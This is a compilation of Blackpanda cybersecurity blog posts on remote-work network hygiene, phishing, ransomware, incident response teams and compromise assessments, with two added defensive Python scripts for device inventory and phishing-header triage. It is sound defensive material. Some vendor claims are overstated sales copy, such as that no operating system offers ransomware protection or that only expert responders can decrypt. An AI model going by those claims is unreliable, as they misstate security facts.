Once logged in, you should also check to see if there are any firmware updates available, install them, and enable “automatic updates” if not already selected.

After logging in, you can also see what devices are connected to your router. Do you recognize all of them? For added security, consider starting an asset inventory to keep track of all authorised and any unauthorised connections. Like account passwords, you should also change your Wi-Fi network passwords on a regular basis. Create a separate network or VLAN for “work” devices to separate them from your family’s many IoT devices, tablets, and non-business-critical devices, further securing your network.

Other things you can do to secure your network connection include using a reputable VPN when connecting to public Wi-Fi, closing and terminating any Remote Desktop Protocol (RDP) or remote access sessions when finished, and updating your antivirus software regularly.
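As an added example (not from the original article), here is a small Python script that turns the asset-inventory and work/home VLAN advice above into a repeatable check: it parses `arp -a`-style output, flags devices whose MAC address is not in your inventory, and flags inventoried devices that have shown up on the wrong network segment. The ARP lines, the inventory and the subnet ranges are constructed sample values; substitute your own router's client list and address plan.

```python
"""Reconcile devices seen on a home network against an asset inventory (added example)."""
import ipaddress
import re

# Constructed sample: lines in the style of `arp -a` on Linux. The "<incomplete>"
# entry shows a host that answered nothing yet; it must be skipped, not crash the parser.
ARP_OUTPUT = """\
work-laptop (192.168.10.20) at aa:bb:cc:00:00:01 [ether] on eth0
? (192.168.1.23) at aa:bb:cc:00:00:02 [ether] on eth0
smart-tv (192.168.1.40) at AA:BB:CC:00:00:03 [ether] on eth0
? (192.168.1.77) at de:ad:be:ef:00:99 [ether] on eth0
? (192.168.10.31) at aa:bb:cc:00:00:04 [ether] on eth0
? (192.168.1.99) at <incomplete> on eth0
"""

# Constructed inventory: MAC address -> (label, segment the device is allowed on)
INVENTORY = {
    "aa:bb:cc:00:00:01": ("work laptop", "work"),
    "aa:bb:cc:00:00:02": ("family tablet", "home"),
    "aa:bb:cc:00:00:03": ("living-room TV", "home"),
    "aa:bb:cc:00:00:04": ("kid's phone", "home"),
}

# Assumed address plan: a separate VLAN/subnet for work devices, another for everything else
SEGMENTS = {
    "work": ipaddress.ip_network("192.168.10.0/24"),
    "home": ipaddress.ip_network("192.168.1.0/24"),
}

ARP_LINE = re.compile(r"\((?P<ip>[\d.]+)\) at (?P<mac>[0-9a-fA-F:]{17})")


def parse_arp(text):
    """Return [(mac, ip), ...] for every resolved ARP entry; MACs are lower-cased."""
    devices = []
    for line in text.splitlines():
        match = ARP_LINE.search(line)
        if match:  # incomplete entries have no MAC and are skipped
            devices.append((match.group("mac").lower(),
                            ipaddress.ip_address(match.group("ip"))))
    return devices


def segment_of(ip):
    """Name of the segment an address falls in, or 'unknown' if outside the plan."""
    for name, network in SEGMENTS.items():
        if ip in network:
            return name
    return "unknown"


def reconcile(arp_text, inventory):
    """Classify each seen device as ok, misplaced (wrong segment) or unknown (not inventoried)."""
    report = {"unknown": [], "misplaced": [], "ok": []}
    for mac, ip in parse_arp(arp_text):
        seen_on = segment_of(ip)
        entry = inventory.get(mac)
        record = {"mac": mac, "ip": str(ip), "segment": seen_on}
        if entry is None:
            report["unknown"].append(record)
        elif entry[1] != seen_on:
            record.update(label=entry[0], expected=entry[1])
            report["misplaced"].append(record)
        else:
            record["label"] = entry[0]
            report["ok"].append(record)
    return report


if __name__ == "__main__":
    result = reconcile(ARP_OUTPUT, INVENTORY)
    for device in result["unknown"]:
        print(f"UNKNOWN   {device['mac']} at {device['ip']} on {device['segment']} segment")
    for device in result["misplaced"]:
        print(f"MISPLACED {device['label']} ({device['mac']}) on {device['segment']}, "
              f"expected {device['expected']}")
    print(f"{len(result['ok'])} device(s) match the inventory")
```

Running it on the sample flags the unlisted `de:ad:be:ef:00:99` host and the kid's phone that has landed on the work subnet.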

Separating Browsers for Work & Play

The ideally secure work-from-home office space would be off-limits to family and friends. That network would have a dedicated computer and network segment for work only, and even its own Internet connection. However, this is not always possible. With budgets tightening, companies may ask employees to use their own devices.  Naturally, this means that people will be more likely to use a single device for both work and personal activity.  

If you find yourself in this predicament, there are a couple of tips to greatly reduce your exposure to cyber threats. One of these is to “silo” your web browsing activities – one browser for work, and one for personal use. Some cyber attacks take advantage of the way web browsers store user information, field values, and even passwords. For example, if Chrome is your work browser and Mozilla Firefox is your personal browser, then it is more difficult for an attacker to leap from one to the other to gather data. By creating two silos, you reduce exposure.

Another simple practice that should become a habit is clearing your cookies and cache frequently. By doing so, you delete all saved information (like passwords) and help prevent websites from tracking you.

For your dedicated “work browser” you can also explore privacy-enhancing extensions and add-ons. Be sure to research any add-on before you install it, and recognize that some may (thankfully) block content such as JavaScript, Flash, and other plugins with known vulnerabilities.

Phishing Awareness

Phishing attacks aren’t only found in emails – you can be phished through a text message, phone call, or even Facebook. Your spam filters are usually not sharp enough to keep you safe from all forms of phishing. Especially when working from home, remain vigilant, and look for unusual characteristics. 

For example: Do you know the sender? Can you see the full, original email header and verify the address? Does the language in the email read smoothly and sound normal? Is there a legitimate reason to click, download, or open a link or attachment? If the answer to the above is no, then assume it is a phishing email. Flag it as spam, delete it, and most importantly do NOT forward it to your coworkers, but to a dedicated security team member. If you need to inform someone else, take a screenshot and send it as a separate email or through another channel.

For any calls to action, visit the official page, and avoid accessing them through notifications or links sent to you unless you can verify the request. You owe attackers nothing.
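As an added example that is not part of the original post, the following Python script applies the header checks above to a raw email: it compares the display name, Reply-To and Return-Path against the sender's domain and reads the receiving mail server's Authentication-Results verdicts (SPF, DKIM, DMARC). Both messages are constructed samples and every domain in them is a placeholder.

```python
"""Header triage for a suspected phishing email (added example, not Blackpanda code)."""
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed sample 1: a spoofed "update the bank details" request.
# The display name imitates an internal address while the real sender is elsewhere.
SUSPICIOUS_MESSAGE = """\
Return-Path: <bounce@mailer-example.test>
Authentication-Results: mx.example.com; spf=fail smtp.mailfrom=mailer-example.test; dkim=none; dmarc=fail header.from=example.com
From: "finance@example.com" <finance@exarnple-billing.test>
Reply-To: "Accounts" <payments@another-domain.test>
To: staff@example.com
Subject: Urgent: updated bank details for vendor payment

Please update the vendor account before 5pm today.
"""

# Constructed sample 2: a legitimate newsletter that passes every check.
CLEAN_MESSAGE = """\
Return-Path: <newsletter@example.com>
Authentication-Results: mx.example.com; spf=pass smtp.mailfrom=example.com; dkim=pass header.d=example.com; dmarc=pass header.from=example.com
From: "Example Newsletter" <newsletter@example.com>
To: staff@example.com
Subject: Monthly update

Here is this month's update.
"""


def _domain(addr):
    """Lower-cased domain part of an address, or '' if there is no '@'."""
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def _auth_results(value):
    """Pull spf=/dkim=/dmarc= verdicts out of an Authentication-Results header."""
    results = {}
    for mechanism in ("spf", "dkim", "dmarc"):
        match = re.search(rf"\b{mechanism}=(\w+)", value, re.IGNORECASE)
        if match:
            results[mechanism] = match.group(1).lower()
    return results


def triage_headers(raw_message):
    """Return the sender address plus a list of human-readable red flags."""
    msg = message_from_string(raw_message)
    findings = []

    from_name, from_addr = parseaddr(msg.get("From", ""))
    from_domain = _domain(from_addr)

    # 1. A display name that is itself an address from a different domain
    name_match = re.search(r"[\w.+-]+@([\w.-]+)", from_name)
    if name_match and name_match.group(1).lower() != from_domain:
        findings.append(f"display name shows @{name_match.group(1)} "
                        f"but the sender is @{from_domain}")

    # 2. Replies silently routed to another domain
    _, reply_addr = parseaddr(msg.get("Reply-To", ""))
    if reply_addr and _domain(reply_addr) != from_domain:
        findings.append(f"Reply-To domain {_domain(reply_addr)} differs from {from_domain}")

    # 3. Envelope sender (Return-Path) from another domain
    _, return_addr = parseaddr(msg.get("Return-Path", ""))
    if return_addr and _domain(return_addr) != from_domain:
        findings.append(f"Return-Path domain {_domain(return_addr)} differs from {from_domain}")

    # 4. SPF / DKIM / DMARC verdicts recorded by the receiving server
    auth = _auth_results(msg.get("Authentication-Results", ""))
    if not auth:
        findings.append("no Authentication-Results header: SPF/DKIM/DMARC were not evaluated")
    for mechanism, verdict in auth.items():
        if verdict != "pass":
            findings.append(f"{mechanism}={verdict} (expected pass)")

    return {"from": from_addr, "findings": findings, "suspicious": bool(findings)}


if __name__ == "__main__":
    for label, raw in (("suspicious", SUSPICIOUS_MESSAGE), ("clean", CLEAN_MESSAGE)):
        report = triage_headers(raw)
        print(f"[{label}] from={report['from']} suspicious={report['suspicious']}")
        for finding in report["findings"]:
            print("   -", finding)
```

The first sample produces six findings (mismatched display name, Reply-To and Return-Path, plus failed or absent SPF, DKIM and DMARC); the second produces none. Authentication-Results is only trustworthy when it was written by your own mail server, so strip or ignore copies that arrive from outside.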

What should I do to defend myself from cyber attacks?

Waiting for an attack to happen before you contact a cyber incident response team can cost precious time and a high hourly fee, which is why pre-purchasing a retained solution is the best way to optimise response time and minimise costs.

Blackpanda’s IR-1 subscription is the most effective solution for small and medium enterprises in Asia Pacific facing limited resources and knowledge in managing cyber breaches. IR-1 aims to help them manage cyber breaches and mitigate their impact by offering a 12-month subscription plan that includes 24/7 incident response availability, one incident response activation credit, discounted rates for Blackpanda services, and unlimited access to a digital library. IR-1 is staffed by highly trained specialists, and businesses can renew the subscription upon expiry.

Get in touch with us to learn more about IR-1.

The Basics

What is ransomware?

Ransomware is one of the most devastating types of cyber crime today. What is ransomware? Who is targeted? And how can you protect yourself from it?

Ransomware is a type of malware that targets an organization’s data. Attackers use it to hold valuable information hostage through encryption, requiring a ransom payment for it to be restored.

Ransomware affects millions of businesses globally and is currently growing at unprecedented rates — both in terms of the likelihood of a ransomware attack against your organization and of the average ransom amount requested. Ransomware is designed to spread across a network and target database and file servers, and can thus quickly paralyze an entire organization. 

The motivation behind ransomware attacks is primarily economic, as companies are often willing to pay millions of dollars to the attackers in order to have their files unlocked, systems restored, and business operations resumed smoothly.

With cyber criminals continuously upgrading their malware and with attack strategies becoming increasingly sophisticated, these threat actors are developing resources to conduct cyber attacks of enormous magnitude and impact. 

Stay-at-home notices introduced during the COVID-19 pandemic have contributed to increased organizational cyber vulnerabilities with employees using personal devices connected to home or shared networks which are far less secure than organizational ones. Combined with bad cyber hygiene and a lack of general awareness of cyber best practices, organizations are truly at risk of a cyber breach.

In this article, we take a deep dive to learn more about what ransomware is, how long this attack vector has been around, and its impact on businesses and individuals today.

Who created ransomware?

While ransomware has been making headlines for at least the past three years as a novel attack vector, the first recorded ransomware attack occurred almost thirty years ago.

The first person to create a ransomware-type virus was Doctor Joseph Popp in 1989. His program—dubbed the “AIDS Trojan”—was distributed via floppy discs to unknowing attendees of a research conference. Believing the discs were research tools, the victims inserted the discs, and with them the malware, into their computers. Once the disk was inserted, the ransomware started encrypting only the file names—rather than the files themselves, as happens nowadays. The ransom request amounted to USD 189, with the promise that instructions to decrypt their systems would be provided once the payment had been made. In fact, the ransomware had a flaw that made it possible to independently decrypt the files without making the ransom payment.

Still, ransomware did not become the most common type of cyber attack until recently. Up until the early 2000s, Distributed Denial of Service (DDoS) attacks were more common than ransomware. This trend shifted with the catastrophic attack known as WannaCry, which in 2017 compromised entire sectors around the world, initiating what some have called “the era of ransomware.”

Ransomware is a crime punishable by imprisonment in most countries, either under cyber-specific laws or under other laws related to information theft and extortion. It is increasingly debated whether laws should be put in place to ban the payment of ransoms. The US already has laws in place to punish those who pay ransoms to a select list of cyber threat actors. In the future, it is likely that most countries will ban the payment of ransoms completely, as these fuel the cyber criminal economy and empower attackers to produce more effective and dangerous ransomware.

How does ransomware work?

Although in some cases—such as with the famous WannaCry virus or NotPetya—ransomware can travel between computers without user interaction, ransomware attacks are typically carried out using a Trojan. A Trojan is a type of malware that is typically downloaded onto an endpoint when a user clicks a phishing link or opens an email attachment. Like the mythical Trojan horse, it is disguised as benign software and can often pass undetected by Endpoint Detection and Response (EDR). Once it is inside the computer, the Trojan can delete, block, copy and modify data such as passwords and keystrokes, and it can also disrupt the performance of computers or computer networks, opening the door for further malware.

Ransomware acts rapidly, and can encrypt important files on every single device on the network within hours, minutes, or even seconds, depending on the number of targets in the attack and whether or not the attacker has spent time silently monitoring and exfiltrating data prior to encryption. 

After encrypting all files in a computer, the ransomware will display a message on the desktop, giving instructions on how to pay the fee to obtain the decryption key from the attackers. Some examples of ransomware messages include: "Your computer has been infected with a virus. Click here to resolve the issue", "Your computer was used to visit websites with illegal content. To unlock your computer, you must pay a $100 fine”, or "All files on your computer have been encrypted. You must pay this ransom within 72 hours to regain access to your data”.

Ransomware attacks and their variants are rapidly evolving to counter preventive technologies for several reasons. For one, the availability of malware kits through Ransomware-as-a-Service (RaaS) allows inexperienced hackers to conduct large-scale attacks. Secondly, the use of generic interpreters allows for the creation of cross-platform ransomware (for example, Ransom32 uses Node.js with a JavaScript payload). Finally, new ransomware techniques are emerging—including encrypting the complete disk instead of selected files and exfiltrating data—which make the ransomware’s work faster and more damaging to the victim.

There are three main ways for ransomware to infect your computer: 

1. Malspam emails

Malicious spam, or “malspam” emails, are unsolicited malicious emails that are used to deliver malware. The email may contain the virus disguised as a credible attachment in the form of a PDF, Word document, or link to a malicious website. Malspam preys on human weaknesses, using social engineering to deceive people into opening attachments or clicking links by appearing to originate from a legitimate source (e.g., a trusted friend or reputable organisation).

2. Malvertising

Malicious advertising, otherwise known as “malvertising”, is another way ransomware is delivered, and one that requires little to no user interaction. While scrolling through a website, users can be redirected to criminal servers without even clicking on the advertisement, as these malicious ads often appear as pop-up windows.

It must be noted that reputable, legitimate websites are not immune to malvertising. You might have the latest and best computer protection, but all it takes is one wrong click or pop-up for you to fall prey to such attacks.  

3. Ransomware-as-a-Service (RaaS)

Ransomware is so popular and effective among cybercriminals these days that many malicious actors operate Ransomware-as-a-Service (RaaS) business models in online criminal markets.

RaaS allows anyone who wants to access and use ransomware against another individual or business to do so by simply paying online providers for the service, significantly lowering the barrier for cyber criminals. Many RaaS providers operate with a high level of sophistication, offering competitive market prices and excellent customer support services to their criminal patrons. 

How long does a ransomware attack take? 

The lifespan of a cyber attack – the length of time an attacker has free rein in an environment, from the moment they get in until they are eradicated – is its dwell time. The longer attackers have access to a network, the more opportunities they have to collect vital data and cause disruptions across the company’s digital systems.

On a global level, the average cyber dwell time in 2020 was 56 days. However, Asian companies are performing much worse than their US and EU counterparts when dealing with cyber attacks. In Hong Kong and Singapore attackers are often able to operate undetected for much longer, with most cyber attacks dwelling in systems for between 90 and 180 days respectively, and some even lasting years.

Given the speed at which ransomware can hold your information hostage, time is of the essence. A few seconds can make the difference between securing valuable information and risking losing it while having to pay out a much bigger ransom. Having a good cyber incident response strategy in place is the best way to prepare your organization to promptly respond to a ransomware attack and minimize its dwell time.

The impact of ransomware 

Ransomware can have a debilitating impact on organizations due to a variety of factors. Firstly, ransomware causes a temporary, and possibly permanent, loss of critical company data. This can bring about a complete shutdown of business operations for several days, resulting in financial loss from revenue interruption. Further financial losses are associated with remediation efforts, as companies without a good cyber insurance plan must bear the burden of incident response costs, as well as expenses for legal and PR activities related to the event. 

On top of this, if the company decides to pay the ransom, this can put a several-million-dollar dent in its finances. It is important to note that paying the ransom does not guarantee that the data will be restored. Especially with the rise in semi-skilled attackers conducting ransomware operations, it often happens that the attackers themselves do not have a working decryption key. In fact, 1 in 5 small and medium enterprises (SMEs) that suffered a ransomware attack and paid the ransom do not get their data back.

In addition, decrypting files does not mean the malware infection itself has been removed. Relying on an experienced digital forensics and incident response provider like Blackpanda is the best way to ensure that there are no ongoing threats to your organization. Perhaps most dramatically, company reputation can be permanently damaged, as clients lose their trust in the organization’s ability to protect their sensitive information and provide them with good services. 

How common is ransomware?

Ransomware attacks have been on the rise, with the Asia Pacific region alone experiencing a 168% increase in ransomware incidents in 2021 compared to the previous year. Not only are ransomware attacks becoming more common, but they are targeting organizations across all sectors and sizes, especially Small-Medium Enterprises (SMEs) and startups. 

In Singapore alone, the Cyber Security Agency received 61 reports of ransomware attacks, almost double the figure for the whole of 2019 (The Straits Times, 2020). The increased incidence of ransomware attacks can be linked to the emergence of ‘Ransomware-as-a-Service’ (RaaS): a business model designed by cyber criminal organisations which lease ransomware variants to their clients in exchange for a percentage of the ransom paid by the victim. This way, people with little to no technical knowledge are able to launch sophisticated ransomware attacks on organizations.

With the average ransom demand averaging USD 180,000, hackers are always on the lookout for digital open doors. It is crucial for organizations of all sizes to be informed of the cyber risks they face and build resilience.

No one can ever be safe from ransomware. As a type of malware that is primarily initiated by human error and which can cause large damages within seconds, no Operating System (OS)—whether it be Mac, Windows 10, or Linux—has ransomware protection. Even traditional Endpoint Detection and Response (EDR) and anti-virus can do very little to prevent ransomware, as these work by searching for known malware. Given ransomware’s rapid development and its constantly evolving strains, EDR and anti-virus simply cannot keep up. Behavior-based threat hunting is the best solution to catch early signs of compromise.  

Contrary to what many believe, you cannot simply delete ransomware, and only expert incident responders have a chance of independently decrypting data or mitigating the damage brought about by ransomware.

"With rapid growth across Asia-Pacific markets, ransomware-related acts are increasingly normalizing in the region as attackers follow the money trail"

Who are the targets of ransomware attacks?

In the past, ransomware attackers targeted individuals. However, cybercriminals have more recently turned to businesses for larger payouts, affecting more endpoints and to detrimental effect.

Attackers target organizations holding sensitive data which can (and often do) pay quickly to retrieve their data and avoid irreparable damage or embarrassment. Such firms include financial institutions, medical facilities, and government agencies.

Hackers know that these industries require consistent and reliable access to their data and face serious repercussions if the Personally Identifiable Information (PII) of their patients, clients, or contractors is destroyed or released.

Western markets like the United States, Canada and the United Kingdom remain the top three targets for ransomware attacks geographically. However, with rapid growth across Asia-Pacific markets (such as Hong Kong, Singapore, and ASEAN economies) ransomware-related acts are increasingly normalizing in the region as attackers follow the money trail. 

How to stay protected from ransomware?

A commitment to cyber hygiene is critical to protecting organizations and users from cyber threats.  Malware protection begins with the basics, as follows:

  1. Update your software and operating system regularly. Outdated applications are at higher risk of compromise and are often the target of attacks.

  2. Configure firewalls to block access to malicious IP addresses.

  3. Do not click on links or open attachments from people who are outside your network or organisation unless they are completely trustworthy. If in doubt, confirm with the sender that they intended to send the communication, through a new reply email or a phone call.

  4. Back up your devices to an external hard drive on a regular basis and disconnect the hard drive from your computer following backups – backups are also targeted by attackers.

  5. Follow safe practices when browsing the internet. Do not visit pages with uncommon URLs or sites that are not trusted.

  6. Enable strong email spam filters to prevent phishing attempts from reaching end users.

  7. Be wary of attachments that require you to enable macros to view files. Macro malware can infect multiple files.

  8. Authenticate inbound emails to prevent email spoofing.

  9. Apply application whitelisting to monitor the applications allowed to run on your network.

  10. Avoid revealing any personal or financial information over email or over the phone. Important transactions should occur face to face where possible.

More technical solutions include engaging a ransomware incident response firm to perform a routine risk analysis on your networks and servers to identify potential points of compromise. Compromise Assessments offer a holistic option, as they help single out bugs and vulnerabilities in the network, identify opportunities for improvement, and produce information about whether the company is already under attack. They also aid Incident Response efforts—if required—by helping reduce dwell time and enabling prompt activation of response plans and processes.

For professional assistance with any of the above services, please schedule a call with a Blackpanda incident response expert here.

React & Respond

How to build an effective incident response team

Learn more about the necessary structure, skills, roles and responsibilities to best coordinate effective incident response.

Handling cyber security incidents can be stressful, especially with uncertainty regarding cause, remediation, and the extent of the impact. However, firms are often required to respond to an attack immediately with whatever information is available, or they run the risk of greater loss. This stress intensifies when firms do not know what to do or whom to call, leaving them seemingly helpless and more susceptible to loss.

To better prepare for cyber emergencies, firms should invest in a team of incident responders who are equipped with technical skills to act quickly and reliably. The incident response team is responsible for mitigating the effects of an incident in a timely and organized manner, including analyzing the intrusion, containing the impact, investigating the root cause, and remediating the issue.

Structures and forms

Depending on the needs and priorities of an organization, the incident response team can take on varying structures, including both internal and external parties. The scope of responsibilities may also differ depending on the nature of an incident. For instance, an organization can set up its own dedicated Security Operations Center (SOC), an internal division consisting of IT and security personnel taking care of continuous monitoring and handling incidents. A company can also have an external partner committed to activating as needed to provide incident triaging services or an advanced level of digital forensics and crisis management expertise.

In order to ensure coverage and availability, many organizations, especially large global ones, choose to have their incident response teams located in multiple regions such as North America, Europe, and APAC, with an active incident response team available whenever a security incident is discovered. Having worked in a few companies with such a global incident response team set-up, I found the strength of local presence highly valuable.

However, teams operating across large distances and multiple time zones must employ proper communication and collaboration efforts. Information sharing and transparency with established standard operating procedures for incident collaboration and handover are extremely important for the multi-regional incident response team to be effective. For organizations without global presence, incident response teams may work in shifts to achieve 24/7 coverage as needed. Otherwise, partnering or contracting with locally-based, specialized incident response firms like Blackpanda is often more cost-effective.

Roles and responsibilities

As the structure and form vary, an incident response team may comprise multiple different roles. Below is a list of key members for an effective incident response team and their responsibilities. Depending on the nature of a cyber incident, additional or fewer roles may be required.

  1. Senior/Executive Management, who will effectively lead and oversee all activities, making or approving critical decisions and directives;

  2. Incident Manager, who will manage and coordinate the overall incident response process, identify necessary tasks and assign them properly, ensuring important information and evidence are properly retrieved, documented, analyzed, reported, and escalated to the appropriate channels when necessary;

  3. Department Leads, who will lead respective functional support as required, including timely dissemination of communications, media relations, regulatory compliance, HR and employee coordination (especially if an internal employee is discovered to be part of the incident), legal representation and guidance on any liability issues that may ensue;

  4. Technical Lead/Recovery Manager, who will work closely with the Incident Manager, usually leading the investigation on-site and focusing on the technical tasks, particularly the initial scoping of compromised assets in the identification phase;

  5. Security Analysts and Researchers, who will work closely with the Technical Lead to investigate the cyber incident, focusing on identifying the scope, containing the damage, analyzing the root cause, assisting in recovery, and documenting all details into an incident report; they may also conduct continuous monitoring and gather threat intelligence.

Regardless of the role a member plays in the incident response team, it is essential for everyone to be actively involved in the ‘Incident Response Preparation’ and ‘Lessons Learned’ phases to ensure the team understands the organization policies, communication plan, tools, and resources available.

Additionally, key members of the team are recommended to have auxiliaries or deputies such that the entire incident response team always functions seamlessly and effectively when any members are unavailable.

Skills and experience

Varying levels of skill and experience are often required for different cyber incidents. Particular skills an incident response team may need include digital forensics capabilities, malware analysis and reverse engineering, and data analysis, as well as soft skills such as effective communication, collaboration, and documentation.

To build an effective incident response team, relevant training on the required skill sets is essential. Table-top exercises and red team attack simulations are great ways to identify any gaps or critical skills missing for potential team training. Frequent training also keeps the team up to date on the latest risk and security trends, bracing them well to fight new threat actors and attack strategies.

In addition, arming the team with the right set of tools will also enhance the performance and capabilities. Likewise, it is highly recommended to provide specific training on available tools with hands-on practice to ensure the team fully understands how best to use them. With a structure suitable for your organization, the proper roles established, and the professional skills and tools training in place, an effective incident response team can be built.

For professional consultative support in establishing such a team or response strategy, Blackpanda offers IR consulting services tailored to your individual business requirements. If you’re already a Blackpanda Cyber Crisis Member, you also qualify to receive Member-exclusive rates for these services. Please feel free to reach out to us to discuss the most efficient and effective steps toward achieving your incident response and preparedness goals today.

Prepare

Who needs a compromise assessment?

Compromise assessments help minimize cyber risks whilst ensuring compliance and assuring clients

Compromise Assessments are a powerful method of evaluating an organization’s cyber security posture. By verifying whether active threats exist within the network and eradicating them before they can cause damage, the service identifies intrusions pre-emptively, before they become damaging incidents. In Blackpanda’s experience, 91% of companies conducting their first Compromise Assessment have discovered active threats residing in their networks.

Cyber attackers often work undetected in a network for months or years, often entering through “legitimate” paths, setting off no alarms and leaving no trace of forced entry. Like a sniper, attackers lie in wait, gathering or exfiltrating confidential intel and building a profile of your business while looking for the perfect time to strike. 

Compromise Assessments seek to find attackers who are currently positioned in an environment or that have been active in the recent past. The assessment process is akin to the steps that Blackpanda incident responders would take in the event of a breach: an inside-out investigation and security audit of the organization’s internal environment, applications, infrastructure, and endpoints.

Compromise assessments for compliance

Compromise Assessments not only reduce the chances of your organization being hit by a devastating cyber attack. They can also assure clients that their data is being appropriately protected, and investors that their money is in safe hands. In fact, one of the biggest hidden costs of cyber breaches is reputational damage, as clients and partners may feel that the breached organisation is not trustworthy enough to adequately protect itself from cyber threats. 

Additionally, in many countries around the world, conducting a Compromise Assessment is a legal requirement for certain industries including financial institutions, and is highly recommended for others.

For example, Singapore’s MAS Technology Risk Management (TRM) Guidelines for financial institutions dedicate sections to cyber event monitoring and detection and to incident response (12.2 Cyber Event Monitoring and Detection and 12.3 Cyber Incident Response and Management). The MAS TRM directives also call for strengthening system security and resilience and deploying strong authentication to protect sensitive data. Applying required security patches and conducting regular Compromise Assessments are practical ways to meet these expectations. Check your local regulations for the detailed cyber security requirements that apply to your organization.

Do small businesses need compromise assessments?

Cyber attacks are becoming more common. They target organizations across all sectors and sizes, and small and medium-sized enterprises (SMEs) and start-ups are being hit especially hard. Research by the insurer Chubb found that 93% of SMEs that experienced a cyber incident reported a severe impact on their business. For these reasons, start-ups and SMEs must strengthen their cyber security measures. Building their security will help SMEs maintain confidence in the Asian and global markets while surviving in an ever-changing cyber threat landscape.

While a strong digital infrastructure and good cyber hygiene can protect organizations from up to 90% of cyber risks, they are not sufficient on their own. Attackers are continuously looking for gaps, and a single instance of negligence can severely compromise the security of the company. Blackpanda’s Compromise Assessment services for small businesses can help your organization improve its cyber security posture.

How often should you perform a compromise assessment?

Global financial institutions have internal teams, just like Blackpanda’s, conducting Compromise Assessments on a daily basis, as their risk tolerance for being unaware of an active breach is essentially nil. For smaller companies, which can accept a higher risk tolerance, Compromise Assessments can be conducted weekly, monthly, or even quarterly; the decision on frequency is ultimately a cost-benefit analysis for each business.

Blackpanda recommends a minimum of quarterly Compromise Assessments for Asian businesses because the average regional dwell time, the time between an intrusion and the victim detecting it, is around 90 days. Conducting Compromise Assessments quarterly lets an organization find an active breach deliberately rather than stumbling on it by accident after a typical dwell period, and so reduces the damage the attacker can inflict.

Third-party Compromise Assessments are the gold standard, as they are objective and impartial, while limiting the possibility of an insider threat during the course of the operation. 

Blackpanda’s experts are able to dig deeper than day-to-day real-time monitoring normally allows. The assessment also brings tools and techniques, such as digital forensic analysis and behavior analytics, that are typically reserved for incident response, and investigators are better suited to detecting post-compromise activity. Compromise Assessments are an extremely effective defense-in-depth measure for discovering threats that have made it past the first lines of defense.

— —

Compromise Assessments are a key cyber security service, and every company should conduct one at least once per quarter. This ensures that active or potential threats in your network are addressed as soon as possible, minimizing attacker dwell time and in turn reducing the chance that your organization is hit by a catastrophic cyber attack like those witnessed worldwide this year.

Blackpanda is Asia’s premier Digital Forensics and Incident Response provider. Our threat hunting specialists conduct bespoke Compromise Assessments for our APAC based clients on a daily basis. Blackpanda services are available ad hoc for urgent requests, or alternatively at a discounted rate for those who wish to purchase retained hours. 

If you are interested in conducting a Compromise Assessment, contact Blackpanda via the contact form or directly at hello@blackpanda.com.

Prepare

Everything you need to know about compromise assessments

Regular compromise assessments are crucial to protect a company’s cyber security, minimising the dwell time of latent threats in your network.

What is a Compromise Assessment?

Compromise assessments seek to find attackers who are currently in the environment or that have been active in the recent past, in a similar way to what an incident response firm would do in the event of a breach: it is an inside–out investigation and security audit of the organisation’s internal environment, applications, infrastructures, and endpoints. 

Compromise assessments look at the system from the inside, searching for malware that has attempted to compromise, or has successfully compromised, the network, to provide insight into which vulnerabilities are being exploited. Results are based on suspicious user behaviours, extensive log review, Indicators of Compromise (IOCs), and any other evidence of past or present malicious activity, to identify attackers residing in the current environment.

A compromise assessment is composed of 4 key steps:

  1. Onboarding and Network Normalisation—After assessing an organisation’s security posture, we deploy EDR to gather security logs and data for two weeks. This creates a baseline of behaviour, gives us a detailed view of each endpoint’s network traffic and security events, and prepares the environment for advanced threat hunting queries.
  2. Active Threat Hunting—Our Level 3 Threat Hunting specialists conduct extensive log investigations using a proprietary list of more than 120 advanced threat hunting queries, updated weekly to reflect the most recent threat intelligence.
  3. Threat Reporting and Containment—Once our threat hunters have meticulously looked through all logs, a report is produced detailing findings and delineating a path to action based on the state of the system.
  4. Continued Support—Experts personally pore through logs to create a holistic picture of the network. This way, we can support an organisation’s cyber defences beyond the Threat Hunting exercise, flagging activities that damage the organisation’s security. Along the way, we gain a deep understanding of an organisation’s security posture and its specific needs, tailoring our ongoing services to the requirements set by its industry, regional landscape, and the latest trends in cyber attacks.

Learn more about how Blackpanda conducts compromise assessments here.

Who needs a compromise assessment?

Global financial institutions have internal teams, just like Blackpanda’s, conducting compromise assessments on a daily basis, as their risk tolerance for being unaware of an active breach is essentially nil.  

For smaller companies, which can accept a higher risk tolerance, compromise assessments can be conducted weekly, monthly, or even quarterly; the decision on frequency is ultimately a cost-benefit analysis for each business.

While a strong digital infrastructure and good cyber hygiene can protect organisations from up to 90% of cyber risks, they are not sufficient on their own. Attackers are continuously looking for gaps, and a single instance of negligence can severely compromise the security of the company. Blackpanda’s compromise assessment services for small businesses can help your organisation improve its cyber security posture. Learn more about who needs a compromise assessment here.

What is the Difference Between Penetration Testing and Compromise Assessments?

Vulnerability Assessment and Penetration Testing (VAPT), together with its adversary-emulation cousin, red teaming, is a preventive measure to gain awareness of the organisation’s cyber weaknesses so they can be fixed before an attack takes place. (Red teaming is a distinct, objective-driven exercise rather than another name for VAPT, but both look for weaknesses from the outside.)

While VAPT is useful in determining what may go wrong, it cannot by itself detect an attacker who is currently compromising the system. Limiting the dwell time of an attack is the single most effective way to limit its damage and to improve the chances of eradicating it and restoring system health.

Given the speed at which attacks can spread from one infected endpoint to all network endpoints, early detection of an incident can make the difference between a business surviving an attack and having to shut down due to extensive damages. 

Compromise Assessments address many of the same due diligence requirements as VAPTs, but look at the system from the inside, searching for malware that has attempted to compromise, or has successfully compromised, the network and providing insight into which vulnerabilities are being exploited.

Compromise assessments thus offer a current view of the company’s security posture, and the opportunity to respond promptly to any attack before it gets out of hand. By adopting the same inside-out strategy as incident response, compromise assessments are both a preventive and a proactive tool to safeguard and improve an organisation’s cyber security.

Once an attack has been identified in a compromise assessment, the company can immediately initiate the process of containing and eradicating the incident. This is key in safeguarding the organisation’s cyber health and even its overall survival, as the dwell time of a cyber attack is the most important factor determining the severity of the compromise. The longer an attack dwells in the network, the more damage the attackers can do and the higher the chances that the organisation will not be able to recover from the breach.

Learn more about the key differences between VAPT and compromise assessments here.

— —

Regular compromise assessments are crucial to protect a company’s cyber security. An independent compromise assessment can uncover compromises that may have gone undetected, thereby providing the evidence needed to justify additional security investments.

To request information about a Blackpanda compromise assessment on your network, contact us.

Prepare

How to perform a compromise assessment

Here is what Blackpanda experts do to find latent threats in your network.

What is a compromise assessment?

